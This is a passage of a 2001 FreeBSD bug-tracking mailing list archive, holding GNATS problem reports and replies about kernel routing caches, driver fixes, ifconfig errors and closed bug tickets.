(8.11.3/8.11.3) id f55FX0291307; Tue, 5 Jun 2001 08:33:00 -0700 (PDT) (envelope-from hm) Date: Tue, 5 Jun 2001 08:33:00 -0700 (PDT) From: Message-Id: <200106051533.f55FX0291307@freefall.freebsd.org> To: nivit@libero.it, hm@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/26347: [pcvt] incorrect screen number in HP mode Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [pcvt] incorrect screen number in HP mode State-Changed-From-To: open->closed State-Changed-By: hm State-Changed-When: Tue Jun 5 08:32:19 PDT 2001 State-Changed-Why: Fix committed to -current. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=26347 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 8:52:46 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id 3AFFC37B401 for ; Tue, 5 Jun 2001 08:52:44 -0700 (PDT) (envelope-from brdavis@odin.ac.hmc.edu) Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.11.0/8.11.0) id f55Fqaw26164; Tue, 5 Jun 2001 08:52:36 -0700 Date: Tue, 5 Jun 2001 08:52:36 -0700 From: Brooks Davis To: Martin Blapp Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/24137: Aironet driver breaks after firmware upgrade Message-ID: <20010605085236.B23732@Odin.AC.HMC.Edu> References: <200106051150.f55Bo4658471@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="3uo+9/B/ebqu+fSQ" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106051150.f55Bo4658471@freefall.freebsd.org>; from mb@imp.ch on Tue, Jun 05, 2001 at 04:50:04AM -0700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --3uo+9/B/ebqu+fSQ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable This problem can be fixed by the patch in kern/27826. It corrects the structure size and implements checks to avoid panics in case of future sturcture expansions. -- Brooks --=20 Any statement of the form "X is the one, true Y" is FALSE. PGP fingerprint 655D 519C 26A7 82E7 2529 9BF0 5D8E 8BE9 F238 1AD4 --3uo+9/B/ebqu+fSQ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE7HQBDXY6L6fI4GtQRAqUJAJ9qWmnetqFpAF82Z0+4/jWHOjgEiACgkbky e/WXaYgnnRVicEKm06k/MvA= =IqKn -----END PGP SIGNATURE----- --3uo+9/B/ebqu+fSQ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 9:40: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B3EF637B408 for ; Tue, 5 Jun 2001 09:40:00 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55Ge0200857; Tue, 5 Jun 2001 09:40:00 -0700 (PDT) (envelope-from gnats) Received: from goliath.siemens.de (goliath.siemens.de [194.138.37.131]) by hub.freebsd.org (Postfix) with ESMTP id 7F72B37B406 for ; Tue, 5 Jun 2001 09:30:16 -0700 (PDT) (envelope-from andre.albsmeier@mchp.siemens.de) Received: from mail3.siemens.de (mail3.siemens.de [139.25.208.14]) by goliath.siemens.de (8.11.1/8.11.1) with ESMTP id f55GUE409146 for ; Tue, 5 Jun 2001 18:30:14 +0200 (MET DST) Received: from curry.mchp.siemens.de (curry.mchp.siemens.de [139.25.42.7]) by mail3.siemens.de (8.11.1/8.11.1) with ESMTP id f55GUEV10711203 for ; Tue, 5 Jun 2001 18:30:14 +0200 (MEST) Received: (from localhost) by curry.mchp.siemens.de (8.11.3/8.11.3) id f55GUEu36178 for FreeBSD-gnats-submit@freebsd.org; Tue, 5 Jun 2001 18:30:14 +0200 (CEST) Message-Id: <200106051630.f55GUEt76616@curry.mchp.siemens.de> Date: Tue, 5 Jun 2001 18:30:14 +0200 (CEST) From: Andre Albsmeier To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: kern/27890: FreeBSD not always seems to take the best route Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27890 >Category: kern >Synopsis: FreeBSD not always seems to take the best route >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 05 09:40:00 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Andre Albsmeier >Release: FreeBSD 4.3-STABLE i386 >Organization: >Environment: System: 4.3-STABLE #67: Fri Jun 1 12:49:52 CEST 2001 >Description: I have observed this behaviour for a long time now but finally had time to dig into it... I reference syslogd as an example here but I think the problem lies in the network code of the kernel... Simple network: - two routers (1 and 2) - host C with IP 192.168.1.3 - host S with IP 192.168.2.1 All machines are FreeBSD 4.3-STABLE. Router 1 routes pkts between the Internet and 192.168.1.0 Router 2 routes pkts between 192.168.1.0 and 192.168.2.0 +-----+ +-----+ default | | 192.168.1.0 | | 192.168.2.0 -----------| 1 |--------+--------| 2 |--------+-------- more hosts | | | | | | +-----+ | +-----+ | | | +-----+ +-----+ | | | | 192.168.1.3 | C | | S | 192.168.2.1 | | | | +-----+ +-----+ Relevant parts of netstat -rn on C during normal operation: ------------------------------------------------------------- Destination Gateway Flags Netif Expire default 192.168.1.1 UGSc fxp0 127.0.0.1 127.0.0.1 UH lo0 192.168.1 link#1 UC fxp0 => 192.168.1.1 0:e0:18:90:91:bb UHLW fxp0 1182 192.168.1.2 0:e0:18:90:94:c8 UHLW fxp0 1058 192.168.1.3 0:e0:18:90:45:dc UHLW lo0 192.168.1.255 ff:ff:ff:ff:ff:ff UHLWb fxp0 192.168.2 192.168.1.2 UGc fxp0 The syslogd on host C is configured to log messages to syslogd running on host S. This works perfectly, all messages appear on host S. Now we delete the route to net 192.168.2.0 on host C (this can appear automatically if router 2 and/or its routed go down for a while). If syslogd now wants to send a message to S, the kernel uses the default route which is obvious because the route to net 192.168.2.0 is gone. We can see the packets go into router 1. I consider this as the correct behaviour as well. Now we bring back the route to net 192.168.2.0 again on host C exactly as it was before (e.g. by restarting router 2 and/or its routed). We can verify this with netstat -rn on C. We can also ping host S or telnet to it or do other stuff which all work perfectly. The problem is that each time when syslogd on C wants to send a packet to S, the kernel still uses 1 as router even though it should send them through 2. After HUPing or restarting syslogd on C (which means that the UDP socket is closed and opened again) things are back to normal. It seems that as long as packets can be send somewhere, the kernel doesn't bother if there is a better route to the destination until the socket is closed and opened again. >How-To-Repeat: See above. >Fix: Unknown. I am happy to test suggestions, of course. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 10:55:40 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E46137B401; Tue, 5 Jun 2001 10:55:38 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55HtYG11260; Tue, 5 Jun 2001 10:55:34 -0700 (PDT) (envelope-from phk) Date: Tue, 5 Jun 2001 10:55:34 -0700 (PDT) From: Message-Id: <200106051755.f55HtYG11260@freefall.freebsd.org> To: greig@ediacara.org, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/8685: sending a SYST by ftp client closes connection thru Checkpoint Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sending a SYST by ftp client closes connection thru Checkpoint State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Tue Jun 5 10:55:17 PDT 2001 State-Changed-Why: Obviously not a problem in FreeBSD. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=8685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 11: 0:20 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EFA4137B405; Tue, 5 Jun 2001 11:00:16 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55I0Gh11644; Tue, 5 Jun 2001 11:00:16 -0700 (PDT) (envelope-from phk) Date: Tue, 5 Jun 2001 11:00:16 -0700 (PDT) From: Message-Id: <200106051800.f55I0Gh11644@freefall.freebsd.org> To: Arjan.deVet@adv.iae.nl, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/8518: freopen() in append mode followed by ftell() gives strange results Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: freopen() in append mode followed by ftell() gives strange results State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Tue Jun 5 10:57:12 PDT 2001 State-Changed-Why: You can never trust *seek() to tell you where the next write will happen on a file opened in append mode, because another process might sneak in between your *seek() and write() calls. One could possibly use *seek() to discover the offset after the write completes and set the offset, it would then be possible to retroactively compute the location of the data in the file by calling write() first and then *seek(), subtracting the number of bytes written. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=8518 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 11: 1:14 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DA75537B405; Tue, 5 Jun 2001 11:01:10 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55I1AO11770; Tue, 5 Jun 2001 11:01:10 -0700 (PDT) (envelope-from phk) Date: Tue, 5 Jun 2001 11:01:10 -0700 (PDT) From: Message-Id: <200106051801.f55I1AO11770@freefall.freebsd.org> To: yunching@sakura.res.cmu.edu, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/8434: boot.flp /bin/init crashes during probe with 2k/sector MO disk Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: boot.flp /bin/init crashes during probe with 2k/sector MO disk State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Tue Jun 5 11:00:42 PDT 2001 State-Changed-Why: Please try with a modern sysinstall and send patch if still broken. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=8434 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 11: 1:55 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DD6C137B403; Tue, 5 Jun 2001 11:01:53 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55I1rc11953; Tue, 5 Jun 2001 11:01:53 -0700 (PDT) (envelope-from phk) Date: Tue, 5 Jun 2001 11:01:53 -0700 (PDT) From: Message-Id: <200106051801.f55I1rc11953@freefall.freebsd.org> To: yunching@sakura.res.cmu.edu, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/8436: boot.flp sysinstall crashes when probing 2k/sector medium Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: boot.flp sysinstall crashes when probing 2k/sector medium State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Tue Jun 5 11:01:17 PDT 2001 State-Changed-Why: Please try with modern sysinstall and send patch if still broken. (duplicate of 8434) http://www.FreeBSD.org/cgi/query-pr.cgi?pr=8436 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 11: 4:15 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AF1A037B437; Tue, 5 Jun 2001 11:04:05 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55I45S12323; Tue, 5 Jun 2001 11:04:05 -0700 (PDT) (envelope-from phk) Date: Tue, 5 Jun 2001 11:04:05 -0700 (PDT) From: Message-Id: <200106051804.f55I45S12323@freefall.freebsd.org> To: eric@lame.net, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/8311: kernel panic on de0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: kernel panic on de0 State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Tue Jun 5 11:03:50 PDT 2001 State-Changed-Why: closed http://www.FreeBSD.org/cgi/query-pr.cgi?pr=8311 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 11: 9:29 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3A5B237B40E; Tue, 5 Jun 2001 11:09:16 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55I9GR15569; Tue, 5 Jun 2001 11:09:16 -0700 (PDT) (envelope-from phk) Date: Tue, 5 Jun 2001 11:09:16 -0700 (PDT) From: Message-Id: <200106051809.f55I9GR15569@freefall.freebsd.org> To: shigio@wafu.netgate.net, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/5531: [SUBMISSION] new library function abs2rel and rel2abs. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [SUBMISSION] new library function abs2rel and rel2abs. State-Changed-From-To: suspended->closed State-Changed-By: phk State-Changed-When: Tue Jun 5 11:08:58 PDT 2001 State-Changed-Why: patch gone from posted url. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=5531 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 11:40:20 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6D6CF37B408 for ; Tue, 5 Jun 2001 11:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55Ie1Z18947; Tue, 5 Jun 2001 11:40:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 050FC37B407 for ; Tue, 5 Jun 2001 11:34:20 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55IYJL18409; Tue, 5 Jun 2001 11:34:19 -0700 (PDT) (envelope-from nobody) Message-Id: <200106051834.f55IYJL18409@freefall.freebsd.org> Date: Tue, 5 Jun 2001 11:34:19 -0700 (PDT) From: bannai@pacbell.net To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/27891: Cannot assign a IP address to a interface when a route to the same subnet exists in the routing table Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27891 >Category: kern >Synopsis: Cannot assign a IP address to a interface when a route to the same subnet exists in the routing table >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 05 11:40:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Vinay Bannai >Release: 4.2 >Organization: Luminous Networks >Environment: FreeBSD ernestbsd.luminousnetworks.com 4.2-RELEASE FreeBSD 4.2-RELEASE #0: Mon Nov 20 13:02:55 GMT 2000 jkh@bento.FreeBSD.org:/usr/src/sys/compile/GENERIC i386 >Description: When assigning a IP address to a interface, you get a error when a route to the same subnet already exists in the routing table. This can happen usually when running OSPF (or any routing protocol) when a route is learnt from a neighbor. This populates the kernel routing table. At a later stage when you add a interface on the subnet that is learnt from the neighbor, you get a error. We tried this by using a static route. I am not sure if using a static route causes this problem. >How-To-Repeat: - Add a static route to the kernel routing table (eg. 172.16.0.0/16) - Set the IP address of a interface (eg 172.16.100.10) This causes the ifconfig to fail >Fix: I am not sure, but could this be related to using a static route. I will try with a dynamic routing protocol.. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 12:10: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 54D8B37B401 for ; Tue, 5 Jun 2001 12:10:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55JA5J24683; Tue, 5 Jun 2001 12:10:05 -0700 (PDT) (envelope-from gnats) Date: Tue, 5 Jun 2001 12:10:05 -0700 (PDT) Message-Id: <200106051910.f55JA5J24683@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: David Malone Subject: Re: kern/27890: FreeBSD not always seems to take the best route Reply-To: David Malone Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27890; it has been noted by GNATS. From: David Malone To: Andre Albsmeier Cc: FreeBSD-gnats-submit@freebsd.org Subject: Re: kern/27890: FreeBSD not always seems to take the best route Date: Tue, 5 Jun 2001 20:05:57 +0100 On Tue, Jun 05, 2001 at 06:30:14PM +0200, Andre Albsmeier wrote: > The problem is that each time when syslogd on C wants to send > a packet to S, the kernel still uses 1 as router even though > it should send them through 2. After HUPing or restarting > syslogd on C (which means that the UDP socket is closed and > opened again) things are back to normal. This sounds like it is to do with the caching of recently used routes. Does the effect go away if you leave it for a while? Adjusting some of the following sysctls might change how long you have to wait: net.inet.ip.rtexpire net.inet.ip.rtminexpire net.inet.ip.rtmaxcache (Some of the networking people could definitely provide more details.) David. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 12:16:23 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 298BD37B401; Tue, 5 Jun 2001 12:16:21 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55JGKS25396; Tue, 5 Jun 2001 12:16:20 -0700 (PDT) (envelope-from dwmalone) Date: Tue, 5 Jun 2001 12:16:20 -0700 (PDT) From: Message-Id: <200106051916.f55JGKS25396@freefall.freebsd.org> To: chris@zeus.foote.com.au, dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/24730: tail -f barfs on files bigger than 2 Gig Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: tail -f barfs on files bigger than 2 Gig State-Changed-From-To: open->closed State-Changed-By: dwmalone State-Changed-When: Tue Jun 5 12:15:28 PDT 2001 State-Changed-Why: Tail should be OK on big files on -current and -stable now. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=24730 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 12:28:43 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 660A337B40A; Tue, 5 Jun 2001 12:28:39 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55JSdq26387; Tue, 5 Jun 2001 12:28:39 -0700 (PDT) (envelope-from dwmalone) Date: Tue, 5 Jun 2001 12:28:39 -0700 (PDT) From: Message-Id: <200106051928.f55JSdq26387@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, dwmalone@FreeBSD.org Subject: Re: bin/24732: cmp can not compare files lager 2GB but smaller 4GB Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: cmp can not compare files lager 2GB but smaller 4GB Responsible-Changed-From-To: freebsd-bugs->dwmalone Responsible-Changed-By: dwmalone Responsible-Changed-When: Tue Jun 5 12:27:03 PDT 2001 Responsible-Changed-Why: I'll have a look at this one since I had a look at size limits in tail. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=24732 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 12:30: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1553837B403 for ; Tue, 5 Jun 2001 12:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55JU3O26476; Tue, 5 Jun 2001 12:30:03 -0700 (PDT) (envelope-from gnats) Date: Tue, 5 Jun 2001 12:30:03 -0700 (PDT) Message-Id: <200106051930.f55JU3O26476@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Will Andrews Subject: Re: bin/27887: ipfw 'backup' option proposal Reply-To: Will Andrews Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27887; it has been noted by GNATS. From: Will Andrews To: Bill Fumerola Cc: FreeBSD GNATS DB Subject: Re: bin/27887: ipfw 'backup' option proposal Date: Tue, 5 Jun 2001 14:21:38 -0500 On Tue, Jun 05, 2001 at 12:30:02AM -0700, Bill Fumerola (billf@mu.org) wrote: > potential committers: don't commit this. I have a much more generic (atomic > changing of rulesets, recursive inclusing of rulesets) implementation that I > might finish one of these days... > > in any case, doing this in ipfw(8) doesn't even seem like the right place > to pull this off.. Why don't you post what you've got so the submitter and others can pitch in? It doesn't have to be a one-man effort. -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 12:40:15 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B0E8337B408 for ; Tue, 5 Jun 2001 12:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55Je1i27220; Tue, 5 Jun 2001 12:40:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D14F637B401 for ; Tue, 5 Jun 2001 12:39:37 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55JdbH27192; Tue, 5 Jun 2001 12:39:37 -0700 (PDT) (envelope-from nobody) Message-Id: <200106051939.f55JdbH27192@freefall.freebsd.org> Date: Tue, 5 Jun 2001 12:39:37 -0700 (PDT) From: quik@quikbox.ca To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/27892: the uptime command prints out an error message every time I run it. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27892 >Category: bin >Synopsis: the uptime command prints out an error message every time I run it. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 05 12:40:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Antonio D'souza >Release: 4.3-stable >Organization: University of waterloo >Environment: FreeBSD quikbox.ca 4.3-STABLE FreeBSD 4.3-STABLE #1: Wed May 9 22:53:16 EDT 2001 alex@rn-respw2a14.uwaterloo.ca:/usr/obj/usr/src/sys/QUIK i386 >Description: every time I run uptime, I get an odd error message just before the expected output: quik@quikbox:~$ uptime uptime: /dev/:0: No such file or directory 3:38PM up 10 days, 1:15, 2 users, load averages: 1.07, 1.03, 1.16 >How-To-Repeat: run uptime >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 12:57:28 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2936237B406; Tue, 5 Jun 2001 12:57:25 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55JvH528499; Tue, 5 Jun 2001 12:57:17 -0700 (PDT) (envelope-from iedowse) Date: Tue, 5 Jun 2001 12:57:17 -0700 (PDT) From: Message-Id: <200106051957.f55JvH528499@freefall.freebsd.org> To: gunther@gusw.net, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/26176: Kernel panic when using IPsec on high loads Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Kernel panic when using IPsec on high loads State-Changed-From-To: feedback->closed State-Changed-By: iedowse State-Changed-When: Tue Jun 5 12:52:21 PDT 2001 State-Changed-Why: This bug (icmp_error mbuf corruption) has been fixed. Thanks for the bug report! http://www.FreeBSD.org/cgi/query-pr.cgi?pr=26176 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 5 13:20:15 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 473F337B407 for ; Tue, 5 Jun 2001 13:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55KK1w33240; Tue, 5 Jun 2001 13:20:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0FBAC37B40A for ; Tue, 5 Jun 2001 13:13:05 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f55KD4e32570; Tue, 5 Jun 2001 13:13:04 -0700 (PDT) (envelope-from nobody) Message-Id: <200106052013.f55KD4e32570@freefall.freebsd.org> Date: Tue, 5 Jun 2001 